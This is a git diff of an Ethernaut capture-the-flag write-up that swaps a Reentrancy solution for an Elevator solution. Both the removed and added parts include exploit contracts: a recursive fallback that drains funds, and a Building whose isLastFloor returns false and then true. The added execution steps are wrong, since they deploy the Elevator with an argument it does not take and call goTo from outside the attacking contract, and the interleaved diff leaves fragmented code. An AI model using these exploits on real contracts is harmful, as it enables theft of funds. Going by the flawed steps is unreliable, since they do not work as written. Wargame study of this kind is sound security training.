himanshu0810/EthernautSolutions/Level12-Elevator.md

-# Understanding Reentrancy in Solidity Smart Contracts
+# Understanding Trust Issues in Smart Contracts: A Case of Elevator Vulnerability

-Reentrancy is a critical concept in the realm of blockchain security, particularly when it comes to auditing and securing smart contracts.
-Mastering this concept can unlock numerous insights and strategies for ensuring the robustness and safety of decentralized applications (DApps).

-## What is Reentrancy?

-Reentrancy refers to the ability of a contract to call back into itself or another contract while it is still executing.
-This characteristic can lead to unexpected behaviors and vulnerabilities if not handled properly.
-In Solidity smart contracts, reentrancy bugs are particularly concerning as they can enable malicious actors to exploit vulnerabilities and drain funds from contracts.
+In the realm of blockchain development, there's a fundamental principle: "Never trust functions that can change the state of a variable or return different outputs during different executions."
+This principle is essential for ensuring the security and integrity of smart contracts.

-## Exploring a Target Contract
+## The Vulnerable Contract

-Consider the following Solidity smart contract:
+Consider the following Solidity contract:

     ```solidity
     // SPDX-License-Identifier: MIT
-    pragma solidity ^0.6.12;
+    pragma solidity ^0.8.0;

-    import 'openzeppelin-contracts-06/math/SafeMath.sol';

-    contract Reentrance {
+    interface Building {

-      using SafeMath for uint256;
-      mapping(address => uint) public balances;

-      function donate(address _to) public payable {
-        balances[_to] = balances[_to].add(msg.value);
+      function isLastFloor(uint) external returns (bool);
     }

+    contract Elevator {
+      bool public top;
+      uint public floor;

-      function balanceOf(address _who) public view returns (uint balance) {
+      function goTo(uint _floor) public {
-        return balances[_who];
+        Building building = Building(msg.sender);

+        if (! building.isLastFloor(_floor)) {
+          floor = _floor;
+          top = building.isLastFloor(floor);
         }

-      function withdraw(uint _amount) public {
-        if(balances[msg.sender] >= _amount) {
-          (bool result,) = msg.sender.call{value:_amount}("");
-          if(result) {
-            _amount;
       }
-          balances[msg.sender] -= _amount;
     }
-      }

-      receive() external payable {}
-    }

-This contract allows users to donate funds, check their balances, and withdraw funds.
-However, it contains a vulnerability related to reentrancy in the withdraw function.
+This contract represents an elevator system where the goTo function allows users to move to different floors.
+The contract interacts with an external contract (Building) through the isLastFloor function to determine if the current floor is the top floor.

-Exploiting Reentrancy
+## Exploiting the Vulnerability
-To exploit the reentrancy vulnerability in the withdraw function, we can create a malicious contract that calls the withdraw function of the target contract and has a fallback function that gets triggered during the withdrawal process.
-This fallback function can then recursively call the withdraw function, allowing it to repeatedly drain funds from the target contract.
+The vulnerability lies in the reliance on an external contract to determine whether the current floor is the top floor.
+An attacker can exploit this vulnerability by implementing a malicious contract that manipulates the behavior of the isLastFloor function.

 Here's an example of an exploit contract:

     ```solidity
-    contract MaliciousContract {
+    contract MaliciousBuilding is Building {
-        Reentrance private targetContract;

-        constructor(address _targetContract) public {
+    bool private isFirstIteration = true;

+    function isLastFloor(uint) external override returns (bool) {
+        if (isFirstIteration) {
-            targetContract = Reentrance(_targetContract);
+            isFirstIteration = false;
+            return false;
+        } else {
+            return true;
         }

-        function attack() public payable {
-            targetContract.withdraw(msg.value);
       }

-        fallback() external payable {
-            if (address(targetContract).balance >= msg.value) {
-                targetContract.withdraw(msg.value);
     }
-        }
-    }

-In this exploit contract, the attack function initiates the reentrancy attack by calling the withdraw function of the target contract (Reentrance).
-Additionally, the fallback function is triggered during the withdrawal process, allowing for recursive calls to the withdraw function.
+## Exploit Execution
+To execute the exploit and pass this level, follow these steps:

+## Deploy the MaliciousBuilding contract.
+Deploy the Elevator contract, passing the address of the MaliciousBuilding contract as the Building interface.
+Call the goTo function of the Elevator contract with any floor number.
+During the first iteration, the isLastFloor function will return false, causing the top variable to remain false.
+However, during the second iteration, the function will return true, tricking the Elevator contract into believing it has reached the top floor, thus exploiting the vulnerability.

-### Conclusion
+## Conclusion
-Understanding reentrancy vulnerabilities and how they can be exploited is crucial for ensuring the security of smart contracts on blockchain platforms.
-By identifying and addressing such vulnerabilities, developers can build more robust and resilient decentralized applications, protecting users' funds and maintaining trust in the ecosystem.
+This case highlights the importance of robust contract design and the need for cautiousness when interacting with external contracts.
+By adhering to best practices and thoroughly auditing smart contracts, developers can mitigate the risk of vulnerabilities and safeguard decentralized systems against potential exploits.